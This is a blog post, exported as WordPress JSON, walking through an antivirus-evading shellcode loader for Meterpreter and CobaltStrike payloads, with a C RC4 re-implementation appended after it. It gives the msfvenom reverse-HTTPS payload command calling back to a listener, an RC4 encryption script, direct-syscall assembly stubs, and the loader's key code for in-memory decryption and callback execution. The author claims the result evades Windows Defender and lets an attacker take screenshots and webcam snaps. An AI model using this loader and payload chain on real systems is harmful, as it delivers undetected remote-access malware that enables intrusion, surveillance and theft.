{"id":659,"date":"2026-02-01T17:23:21","date_gmt":"2026-02-01T09:23:21","guid":{"rendered":"https:\/\/chengyunpu.com\/wordpress\/?p=659"},"modified":"2026-02-05T07:31:41","modified_gmt":"2026-02-04T23:31:41","slug":"evading-antivirus-with-meterpreter-cobaltstrike-payload","status":"publish","type":"post","link":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/","title":{"rendered":"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">0x00<\/h3>\n\n\n\n<p>Having finished the OSCP and been admitted through the special-talent programme to two of the schools in the University System of Taiwan, I finally had time to dig properly into defense evasion. I built a shellcode loader around RC4 encryption, direct syscalls, and a Windows callback function for in-memory execution. With Windows Defender enabled it runs a Meterpreter session and can carry out the more sensitive operations such as screenshot and webcam_snap; on <a href=\"https:\/\/www.virustotal.com\/gui\/file\/a8cc11b75d78ae06cd28bb478e326a56e59a6e3f4398b826724481e42228754d\">VirusTotal<\/a> its detection rate is 10\/72.<\/p>\n\n\n\n<p>For comparison, the raw payload on its own scores 52\/72 on VT, and the plain exe scores 57\/71.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"471\" src=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1024x471.png\" alt=\"\" class=\"wp-image-669\" srcset=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1024x471.png 1024w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-300x138.png 300w, 
https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-768x354.png 768w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1536x707.png 1536w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image.png 1666w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>My C2 runs in a VM inside an Ubuntu host that sits on the same subnet as the victim (192.168.0.0\/24). On the Ubuntu host an nginx stream (reverse) proxy forwards the traffic on to the C2, so the IP addresses in the video may not look intuitive.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"Evading AntiVirus With Meterpreter Payload\" width=\"500\" height=\"281\" src=\"https:\/\/www.youtube.com\/embed\/yTm60QJeOXo?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>The CobaltStrike Windows stageless payload works too! 
The only catch is the Malleable C2 .profile: the default one cannot be used as-is.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1920\" height=\"1200\" src=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2.png\" alt=\"\" class=\"wp-image-691\" srcset=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2.png 1920w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2-300x188.png 300w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2-1024x640.png 1024w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2-768x480.png 768w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-2-1536x960.png 1536w\" sizes=\"auto, (max-width: 1920px) 100vw, 1920px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">0x01 &#8211; Generate Payload<\/h3>\n\n\n\n<p>Generate a Windows x64 stageless Meterpreter payload in raw format. Stageless means the entire Meterpreter is inside this one blob (hence roughly 200 KB) and nothing further is fetched at runtime.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/tools\/AV_evasion]\n\u2514\u2500$ msfvenom -p windows\/x64\/meterpreter_reverse_https LHOST=192.168.0.144 LPORT=4444 -f raw -o payload.bin\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 204892 bytes\nSaved as: payload.bin<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">0x02 &#8211; RC4 Encrypt Payload<\/h3>\n\n\n\n<p>Use the following RC4 script to encrypt payload.bin so that its static signature is not caught. The key is exported alongside the ciphertext because the loader decrypts with advapi32's SystemFunction032, which implements plain RC4 and therefore produces exactly the keystream this script does.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\"># rc4_encrypt.py\n# Encrypts payload.bin with RC4 and emits two C-style byte lists that the\n# loader pulls in with #include: encrypted_payload.h and rc4_key.h.\ndef rc4_encrypt(data, key):\n    # Key-scheduling algorithm (KSA)\n    S = list(range(256))\n    j = 0\n    for i in range(256):\n        j = (j + S[i] + key[i % len(key)]) % 256\n        S[i], S[j] = S[j], S[i]\n    \n    # Pseudo-random generation algorithm (PRGA): XOR every byte with the keystream\n    i = j = 0\n    ciphertext = bytearray()\n    for byte in data:\n        i = (i + 1) % 256\n        j = (j + S[i]) % 256\n        S[i], S[j] = S[j], S[i]\n        k = S[(S[i] + S[j]) % 256]\n        ciphertext.append(byte ^ k)\n    return ciphertext\n\nwith open('payload.bin', 'rb') as f:\n    shellcode = f.read()\n\nkey = b\"YOUR_SECRET_KEY\"  # change this; it is compiled into the loader\n\nencrypted = rc4_encrypt(shellcode, key)\n\nwith open('encrypted_payload.h', 'w') as f:\n    f.write(\", \".join(f\"0x{b:02x}\" for b in encrypted))\n\nwith open('rc4_key.h', 'w') as f:\n    f.write(\", \".join(f\"0x{b:02x}\" for b in key))\n\nGREEN = \"\\033[92m\"\nBLUE = \"\\033[94m\"\nRESET = \"\\033[0m\"\nINFO = f\"{BLUE}[*]{RESET}\"\nSUCCESS = f\"{GREEN}[+]{RESET}\"\n\nprint(f\"{SUCCESS} Payload encryption complete. File saved: {BLUE}encrypted_payload.h{RESET}\")\nprint(f\"{SUCCESS} RC4 key exported. File saved: {BLUE}rc4_key.h{RESET}\")<\/code><\/pre>\n\n\n\n<p>Running the script produces encrypted_payload.h and rc4_key.h, which loader.cpp pulls in with #include.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/tools\/AV_evasion]\n\u2514\u2500$ python3 rc4_encrypt.py\n[+] Payload encryption complete. File saved: encrypted_payload.h\n[+] RC4 key exported. 
File saved: rc4_key.h<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">0x03 &#8211; Direct Syscalls (NTAPI)<\/h3>\n\n\n\n<p>To stay out of the antivirus's sight as far as possible, rather than calling user-mode APIs that may be hooked, the loader issues the <code>syscall<\/code> instruction itself and transitions into kernel mode directly. The core problem with this is that the <strong>System Service Number<\/strong> of each call can change between Windows builds. To make sure the loader keeps working, I checked the five syscalls it needs against the <a href=\"https:\/\/hfiref0x.github.io\/sctables\/X86_64\/NT10_syscalls.html\" target=\"_blank\" rel=\"noreferrer noopener\">NT OS System Service Table<\/a> beforehand.<\/p>\n\n\n\n<p>It turns out that from <strong>Windows<\/strong> build 10061 through 28020 the SSNs of these key APIs are identical, so there is no build-mismatch problem for now. Keep in mind what this does and does not buy you: direct syscalls only sidestep user-mode hooks in ntdll; a <code>syscall<\/code> instruction executed from outside ntdll's image (and the call stack that results) is itself something EDRs look for, and kernel-side telemetry is unaffected.<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>Function Name<\/th><th>SSN (Win 10\/11 x64)<\/th><th>Purpose<\/th><\/tr><\/thead><tbody><tr><td><strong>NtCreateSection<\/strong><\/td><td>0x4A<\/td><td>Creates a section object in memory.<\/td><\/tr><tr><td><strong>NtMapViewOfSection<\/strong><\/td><td>0x28<\/td><td>Maps a view of a section into the virtual address space of a process.<\/td><\/tr><tr><td><strong>NtProtectVirtualMemory<\/strong><\/td><td>0x50<\/td><td>Changes the protection on a region of committed pages.<\/td><\/tr><tr><td><strong>NtUnmapViewOfSection<\/strong><\/td><td>0x2A<\/td><td>Unmaps a view of a section from the virtual address space.<\/td><\/tr><tr><td><strong>NtClose<\/strong><\/td><td>0x0F<\/td><td>Closes an open object handle.<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code 
lang=\"asm\" class=\"language-asm\">; syscalls.asm: x64 direct-syscall stubs.\n; Each stub mirrors ntdll's own prologue (mov r10, rcx ; mov eax, SSN ; syscall),\n; so the C++ side declares them with the normal NTAPI prototypes and calls them as functions.\n; SSNs are hard-coded for Windows 10\/11 x64 (see the table above).\nBITS 64\nDEFAULT REL\n\nsection .text\nglobal x_001\nglobal x_002\nglobal x_003\nglobal x_004\nglobal x_005\n\n; NtCreateSection\nx_001:\n    mov r10, rcx\n    mov eax, 0x4A\n    syscall\n    ret\n\n; NtMapViewOfSection\nx_002:\n    mov r10, rcx\n    mov eax, 0x28\n    syscall\n    ret\n\n; NtProtectVirtualMemory\nx_003:\n    mov r10, rcx\n    mov eax, 0x50\n    syscall\n    ret\n\n; NtUnmapViewOfSection\nx_004:\n    mov r10, rcx\n    mov eax, 0x2A\n    syscall\n    ret\n\n; NtClose\nx_005:\n    mov r10, rcx\n    mov eax, 0x0F\n    syscall\n    ret<\/code><\/pre>\n\n\n\n<p>Assemble the object file (win64 COFF, so mingw can link it into the loader):<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/tools\/AV_evasion]\n\u2514\u2500$ nasm -f win64 syscalls.asm -o syscalls.o<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">0x04 &#8211; How the Loader Works<\/h3>\n\n\n\n<p>Because the loader was not easy to get right, I am not publishing the complete source; what follows are only the key points of the implementation.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">1. String concatenation obfuscation<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">string s1 = \"a\"; ... string _lib  = s1+s2+s3+s4+s5+s6+s7;   \/\/ \u2192 \"advapi32.dll\"\nstring k1 = \"Sys\"; ... string _proc = k1+k2+k3+k4+k5;       \/\/ \u2192 \"SystemFunction032\"<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Keeps the two tell-tale strings <code>\"advapi32.dll\"<\/code> and <code>\"SystemFunction032\"<\/code> from appearing verbatim in the binary: only short fragments are stored, and the full names exist only at runtime.<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">2. 
Dynamically resolving SystemFunction032<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">HMODULE m = GetModuleHandleA(_lib.c_str());            \/\/ advapi32 is usually already loaded\nif (!m) m = LoadLibraryA(_lib.c_str());\n_T x = (_T)GetProcAddress(m, _proc.c_str());            \/\/ resolve SystemFunction032 by name at runtime<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>SystemFunction032<\/code> is an undocumented RC4 encrypt\/decrypt routine exported by advapi32.dll; resolving it at runtime keeps it out of the import table, and reusing a Windows-provided cipher means the loader carries no RC4 code of its own.<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">typedef struct _USTRING { DWORD Length; DWORD MaximumLength; PUCHAR Buffer; } USTRING;\nNTSTATUS SystemFunction032(USTRING *Data, const USTRING *Key);   \/\/ RC4 applied in place over Data<\/code><\/pre>\n\n\n\n<p>Both arguments use the same descriptor, which is the <code>_K<\/code> struct seen below: the first describes the buffer that is encrypted or decrypted in place, the second holds the key bytes. Because RC4 is symmetric, the same call decrypts what the Python script encrypted.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">3. Payload and key are arrays pulled in with #include<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">unsigned char s[] = {\n#include \"encrypted_payload.h\"   \/\/ a directive must start its own line\n};\nunsigned char t[] = {\n#include \"rc4_key.h\"\n};<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>At compile time the encrypted shellcode and the key are copied straight into the binary; note that <code>#include<\/code> is only recognised as a directive when it is the first token on its line, so the braces have to go on separate lines.<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">4. Allocating executable memory with a Section object<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">x_001(&amp;g, 0xF001F, NULL, &amp;q, 0x40, 0x08000000, NULL);     \/\/ NtCreateSection: SECTION_ALL_ACCESS, MaximumSize q, PAGE_EXECUTE_READWRITE, SEC_COMMIT\nx_002(g, (HANDLE)-1, &amp;y, 0, 0, NULL, &amp;w, 1, 0, 0x40);     \/\/ NtMapViewOfSection into this process: view at y, size w, ViewShare, PAGE_EXECUTE_READWRITE<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>x_001<\/code> \u2192 NtCreateSection (0xF001F = SECTION_ALL_ACCESS, 0x08000000 = SEC_COMMIT)<\/li>\n\n\n\n<li><code>x_002<\/code> \u2192 NtMapViewOfSection ((HANDLE)-1 = the current process)<\/li>\n\n\n\n<li>Protection: 0x40 = PAGE_EXECUTE_READWRITE, needed because the view is first written to and decrypted in place; it is downgraded to RX before execution in the next step.<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">5. 
Write encrypted shellcode \u2192 RC4 decrypt \u2192 change protection \u2192 execute<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">memcpy(y, s, z);               \/\/ copy the still-encrypted shellcode into the section view\n_K o = { (DWORD)z, (DWORD)z, (PUCHAR)y };          \/\/ data descriptor: the view itself\n_K p = { (DWORD)sizeof(t), ..., (PUCHAR)t };       \/\/ key descriptor\nx(&amp;o, &amp;p);                     \/\/ SystemFunction032 \u2192 RC4 decrypt, in place\nx_003(..., 0x20, ...);         \/\/ NtProtectVirtualMemory \u2192 PAGE_EXECUTE_READ (0x20)\nEnumCalendarInfoA((CALINFO_ENUMPROCA)y, 2048, 1, 2);   \/\/ \u2190 runs the shellcode as the callback<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Decryption happens in place, so at no point is plaintext shellcode handed to a function as an argument or copied through a second buffer.<\/li>\n\n\n\n<li>0x20 = PAGE_EXECUTE_READ, the normal protection for a code section; dropping the W bit before execution also means no RWX region is left behind.<\/li>\n\n\n\n<li><strong>EnumCalendarInfoA<\/strong> is the loader's most important covert execution point:<br>it is a callback-style API that expects a CALINFO_ENUMPROCA function pointer (the other arguments are LOCALE_SYSTEM_DEFAULT = 2048, CAL_GREGORIAN = 1 and CAL_SCALNAME = 2).<br>Casting the shellcode address to that callback type makes Windows call it as a \"normal\" callback on the current thread, so no new thread is created. Note that the call only returns when the callback does; a stageless Meterpreter runs its session loop inside that callback, so the cleanup in the next step happens only after the session ends.<\/li>\n<\/ul>\n\n\n\n<h4 class=\"wp-block-heading\">6. 
Clean up afterwards<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"cpp\" class=\"language-cpp\">x_004((HANDLE)-1, y);   \/\/ NtUnmapViewOfSection\nx_005(g);               \/\/ NtClose (section handle)<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>Layer<\/th><th>Technique<\/th><th>Main thing it evades<\/th><\/tr><\/thead><tbody><tr><td>Strings<\/td><td>Concatenation obfuscation<\/td><td>Static scanning, YARA<\/td><\/tr><tr><td>Encryption<\/td><td>RC4 + SystemFunction032<\/td><td>Static signatures, plaintext shellcode<\/td><\/tr><tr><td>Memory allocation<\/td><td>NtCreateSection + NtMapViewOfSection<\/td><td>VirtualAlloc monitoring<\/td><\/tr><tr><td>Write<\/td><td>memcpy into the section view<\/td><td>WriteProcessMemory<\/td><\/tr><tr><td>Decryption<\/td><td>In-place RC4<\/td><td>Plaintext shellcode on the stack or in arguments<\/td><\/tr><tr><td>Execution<\/td><td>EnumCalendarInfoA callback<\/td><td>CreateRemoteThread \/ new threads<\/td><\/tr><tr><td>API level<\/td><td>Native API (Nt*) via direct syscalls throughout<\/td><td>User-mode hooks<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>After compiling, you have a Meterpreter trojan that gets past Defender:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/tools\/AV_evasion]\n\u2514\u2500$ x86_64-w64-mingw32-g++ loader_syscall.cpp syscalls.o -o exp.exe<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"614\" src=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1-1024x614.png\" alt=\"\" class=\"wp-image-686\" 
srcset=\"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1-1024x614.png 1024w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1-300x180.png 300w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1-768x461.png 768w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1-1536x922.png 1536w, https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>0x00 After finishing the OSCP + special-talent admission to [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","categories":[1],"tags":[],"class_list":["post-659","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"yoast_head_json":{"title":"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload - my article","canonical":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/","og_locale":"zh_TW","og_type":"article","og_site_name":"my article","article_published_time":"2026-02-01T09:23:21+00:00","article_modified_time":"2026-02-04T23:31:41+00:00","og_image":[{"url":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1024x471.png"}],"author":"chengyunpu","twitter_misc":{"Author:":"chengyunpu","Estimated reading time":"3 minutes"}}}
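Added example for section 0x02 and for steps 2 and 5 of 0x04 (my code, not the post's loader): a portable C re-implementation of the operation the loader obtains from advapi32!SystemFunction032, using the same {Length, MaximumLength, Buffer} descriptor the post calls `_K`. It shows that the Python script's RC4 and the in-place decrypt are one and the same keystream, checked against the public RC4 test vector (key "Key", plaintext "Plaintext"), and that a second pass with the same key restores the plaintext. The `USTRING` name and the "0 on success" return convention are my assumptions about the undocumented API's layout; the test inputs are constructed.

```c
/* rc4_inplace.c: added example, not the post's loader.
 * Portable stand-in for advapi32!SystemFunction032: standard RC4 applied in
 * place over a {Length, MaximumLength, Buffer} descriptor (the post's _K).
 * Because the transform is in place, the plaintext only ever exists in the
 * destination buffer, which is the property the loader relies on. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Assumed layout of the descriptor SystemFunction032 takes for both args. */
typedef struct _USTRING {
    uint32_t Length;         /* bytes to process */
    uint32_t MaximumLength;  /* capacity of Buffer (unused by RC4) */
    uint8_t *Buffer;
} USTRING;

/* RC4 (KSA + PRGA) XORed over data->Buffer in place.
 * Returns 0 on success, -1 on a bad descriptor (NTSTATUS-style convention). */
int rc4_inplace(USTRING *data, const USTRING *key)
{
    if (!data || !key || !data->Buffer || !key->Buffer || key->Length == 0)
        return -1;

    uint8_t S[256];
    for (int i = 0; i < 256; i++)
        S[i] = (uint8_t)i;

    /* Key-scheduling algorithm: permute S under the key */
    for (int i = 0, j = 0; i < 256; i++) {
        j = (j + S[i] + key->Buffer[i % key->Length]) & 0xFF;
        uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
    }

    /* Pseudo-random generation algorithm: one keystream byte per data byte */
    for (uint32_t n = 0, i = 0, j = 0; n < data->Length; n++) {
        i = (i + 1) & 0xFF;
        j = (j + S[i]) & 0xFF;
        uint8_t t = S[i]; S[i] = S[j]; S[j] = t;
        data->Buffer[n] ^= S[(S[i] + S[j]) & 0xFF];
    }
    return 0;
}

/* Self-test with the well-known RC4 vector: key "Key", plaintext "Plaintext"
 * must give BB F3 16 E8 D9 40 AF 0A D3, and a second pass must restore the
 * plaintext (RC4 is symmetric, which is why the loader's decrypt is the same
 * call as the Python script's encrypt). Returns 1 on success, 0 otherwise. */
int rc4_self_test(void)
{
    uint8_t buf[] = "Plaintext";   /* constructed input, transformed in place */
    uint8_t k[]   = "Key";
    const uint8_t expect[9] = {0xBB,0xF3,0x16,0xE8,0xD9,0x40,0xAF,0x0A,0xD3};

    USTRING data = { 9, sizeof buf, buf };
    USTRING key  = { 3, sizeof k,   k   };

    if (rc4_inplace(&data, &key) != 0) return 0;
    if (memcmp(buf, expect, 9) != 0)   return 0;   /* encrypt matched vector */
    if (rc4_inplace(&data, &key) != 0) return 0;   /* same call decrypts */
    return memcmp(buf, "Plaintext", 9) == 0;
}

int main(void)
{
    printf("rc4 self-test: %s\n", rc4_self_test() ? "ok" : "FAILED");
    return rc4_self_test() ? 0 : 1;
}
```

Feeding the bytes that rc4_encrypt.py writes to encrypted_payload.h through `rc4_inplace` with the bytes from rc4_key.h returns the original payload.bin; the same holds for SystemFunction032, which is why no RC4 code has to be shipped in the loader.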